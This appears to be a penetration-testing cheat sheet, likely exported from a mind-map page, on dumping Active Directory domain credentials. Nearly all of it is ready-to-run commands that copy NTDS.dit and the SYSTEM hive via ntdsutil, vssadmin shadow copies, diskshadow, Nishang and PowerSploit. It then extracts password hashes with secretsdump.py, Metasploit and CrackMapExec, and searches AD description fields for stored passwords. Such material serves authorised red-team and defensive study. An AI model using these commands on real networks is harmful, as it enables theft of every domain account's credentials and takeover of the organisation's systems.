x

Hash Extraction & Domain Credential Dumping

Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)

Using ntdsutil 

C:\
ntdsutil
ntdsutil: activate instance ntds
ntdsutil: ifm
ifm: create full c:\pentest
ifm: quit
ntdsutil: quit

Or 

ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

Using VShadow (tool takes a snapshot of a disk so you can read files that're normally blocked)

  • Requires local admin / SYSTEM 
vssadmin create shadow /for=C :
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit

You can also use the Nishang script, available at : https://github.com/samratashok/nishang 

Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\

Using VSSAdmin 

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy

Extract hashes from ntds.dit

secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

Metasploit can also do this 

windows/gather/credentials/domain_hashdump

PowerSploit module 

Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit

DiskShadow (A Windows Signed Binary)

diskshadow.txt contains 

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset

NOTE - must be executed from C:\Windows\System32 

diskshadow.exe /s  c:\diskshadow.txt
dir c:\exfil
reg.exe save hklm\system c:\exfil\system.bak

Extract hashes from ntds.dit 

secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

Alternatives - modules
Metasploit modules 

windows/gather/credentials/domain_hashdump

PowerSploit module 

Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit

CrackMapExec module 

cme smb 10.10.0.202 -u username -p password --ntds vss

Password in AD User comment 

enum4linux | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas: 
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
Left-click: follow link, Right-click: select node, Scroll: zoom
x